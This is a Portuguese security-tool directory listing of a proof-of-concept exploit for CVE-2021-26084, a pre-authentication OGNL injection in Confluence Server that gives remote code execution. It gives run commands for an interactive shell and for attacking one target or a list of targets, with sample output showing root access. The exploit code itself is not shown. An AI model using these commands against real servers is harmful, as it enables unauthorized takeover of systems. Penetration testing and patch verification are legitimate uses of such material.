Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-26084 — CVE-2021-26084 - Injeção OGNL no Webwork do Confluence Server (RCE pré-autenticação) | Kitploit
Ferramentas/GitHubGitHub/taythebot/cve-2021-26084
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubtaythebot/cve-2021-26084

CVE-2021-26084

CVE-2021-26084 - Injeção OGNL no Webwork do Confluence Server (RCE pré-autenticação)

Ver Repositório
86há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-26084

Prova de conceito para CVE-2021-26084.

Injeção OGNL no Webwork do Confluence Server (RCE pré-autenticação)

Aviso legal

Isto é apenas para fins educacionais. Não sou responsável pelas suas ações. Use por sua conta e risco.

Limitações de comando

Devido ao payload, não é possível passar alguns caracteres. A lista abaixo é o que encontrei durante os meus testes.

  • Aspas duplas "
  • Barra vertical |

Shell interativo

root@kitploit:~
 go run exploit.go -t <target> -i

Exemplo

root@kitploit:~
root@localhost:/# go run exploit.go -t http://localhost:8090 -i
CVE-2021-26084 - Confluence Server Webwork OGNL injection
Made by Tay (https://github.com/taythebot)
time="2021-09-02T00:29:37+09:00" level=info msg="Checking if https://localhost:8090 is vulnerable"
time="2021-09-02T00:29:39+09:00" level=info msg="Target https://localhost:8090 is vulnerable"
root@confluence:/# whoami
root
root@confluence:/# exit
Exiting interactive mode, goodbye
  • Funciona apenas em um único alvo
  • Digite exit para sair do shell interativo
  • O aviso mostra se é uma possível máquina Windows

Alvo único

root@kitploit:~
go run exploit.go -t <target> -c <command>

Múltiplos alvos

root@kitploit:~
go run exploit.go -f <file> -c <command>

Compilação

root@kitploit:~
go mod download
go build exploit.go
Baixar ferramenta